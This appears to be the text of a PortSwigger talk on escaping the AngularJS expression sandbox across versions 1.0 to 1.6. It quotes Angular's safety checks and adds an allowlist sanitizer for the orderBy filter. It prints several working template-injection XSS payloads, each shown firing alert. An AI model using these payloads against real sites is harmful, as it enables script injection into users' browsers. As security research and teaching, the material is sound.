DOM Angular Sandbox escapes.key - PortSwigger

DOM based Angular sandbox escapes

About me
• I’m a researcher at PortSwigger
• I love hacking JavaScript & browsers: Array.from([1],alert)
• Follow me on twitter @garethheyes

No sandbox
• Angular 1.0 - 1.1.5 didn’t have a sandbox
• But expressions were scoped to an object, e.g. alert(1) becomes ({}).alert(1)
• Mario Heiderich discovered expressions could execute arbitrary code

constructor.constructor('alert(1)')()

Basic sandbox
• Angular 1.2.0 introduced a basic sandbox

function ensureSafeMemberName(name, fullExpression, allowConstructor) {
  // Block the "constructor" member unless the caller explicitly allows it
  if (name === "constructor" && !allowConstructor) {
    throw …
  }
  // Block "private" names that start or end with an underscore (e.g. __proto__)
  if (name.charAt(0) === '_' || name.charAt(name.length-1) === '_') {
    throw …
  }
  return name;
}

First sandbox escape
• Jan Horn found the first sandbox escape for 1.2.0

{{a='constructor'; b={}; a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Sandbox improvement
• Angular improved their sandbox

function ensureSafeMemberName(name, fullExpression) {
  // Block the legacy accessor helpers and __proto__, which reach the prototype chain
  if (name === "__defineGetter__" || name === "__defineSetter__" ||
      name === "__lookupGetter__" || name === "__lookupSetter__" ||
      name === "__proto__") {
    throw …
  }
  return name;
}

Sandbox improvement

function ensureSafeObject(obj, fullExpression) {
  if (obj) {
    if (obj.constructor === obj) { // the Function constructor (Function.constructor === Function)
      throw …
    } else if (obj.window === obj) { // the window object
      throw …
    } else if (obj.children && (obj.nodeName || (obj.prop && obj.attr && obj.find))) { // DOM elements and jqLite/jQuery wrappers
      throw …
    } else if (obj === Object) { // Object itself, so Object.* methods can't be reached
      throw …
    }
  }
  return obj;
}

Sandbox party
• We had a party and me, Jan Horn, Mathias Karlsson, Gábor Molnár and Ian Hickey all broke the sandbox
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

{{'a'.constructor.prototype.charAt=[].join; $eval('x=1} } };alert(1)//');}}

Sandbox removed
• Angular removed the sandbox in version 1.6
• Is the fun over?
• What about another context?

Order by filter
• Lewis Ardern pointed out that Angular's orderBy filter evaluates its predicate as an expression
• https://blogs.synopsys.com/software-integrity/2016/12/28/angularjs-1-6-0-sandbox/

$scope.orderby = unescape(location.hash.slice(1));
…
ng-repeat="friend in friends | orderBy:orderby"
• Used for sorting
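The controller above hands location.hash straight to orderBy, which makes the sort control an expression sink. The following is an added example, not code from the talk, showing the allowlist check a defender would put in front of that sink; the field names, the default sort and the function name sanitizeOrderBy are assumptions for the illustration.

```javascript
// Added example (not from the talk): hardening the orderBy sink shown above.
// orderBy evaluates its predicate as an Angular expression, so raw user input
// must never reach it. Instead, map the hash onto an allowlist of field names
// and pass orderBy only those strings.
// The field names and default sort below are constructed for this example.

const ALLOWED_SORT_FIELDS = ['name', 'age', 'email'];
const DEFAULT_SORT = ['name'];

// Parse a sort spec such as "-age,name" (comma-separated, optional +/- prefix
// for direction) into an array of orderBy predicates, keeping only allowlisted
// fields. Any token that is not exactly an allowlisted identifier is dropped;
// if nothing survives, the default sort is returned.
function sanitizeOrderBy(hashSpec, allowedFields = ALLOWED_SORT_FIELDS, fallback = DEFAULT_SORT) {
  if (typeof hashSpec !== 'string') return fallback.slice();
  const predicates = [];
  for (const rawToken of hashSpec.split(',')) {
    const token = rawToken.trim();
    // Only a bare identifier with an optional sign: no dots, brackets, quotes or calls
    const m = /^([+-]?)([A-Za-z_][A-Za-z0-9_]*)$/.exec(token);
    if (!m) continue;
    const direction = m[1];
    const field = m[2];
    // Exact match against the allowlist rejects names such as "constructor"
    if (!allowedFields.includes(field)) continue;
    predicates.push(direction === '-' ? '-' + field : field);
  }
  return predicates.length ? predicates : fallback.slice();
}

// Wiring in the controller from the slide (Angular itself is assumed, not run here):
//   $scope.orderby = sanitizeOrderBy(decodeURIComponent(location.hash.slice(1)));
// The template keeps ng-repeat="friend in friends | orderBy:orderby".
```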

Thanks
• Mario Heiderich, Jan Horn, Mathias Karlsson, Gábor Molnár, Ian Hickey and Lewis Ardern
• PortSwigger
• Can you find an exploit for >1.5.8?

The end
Questions?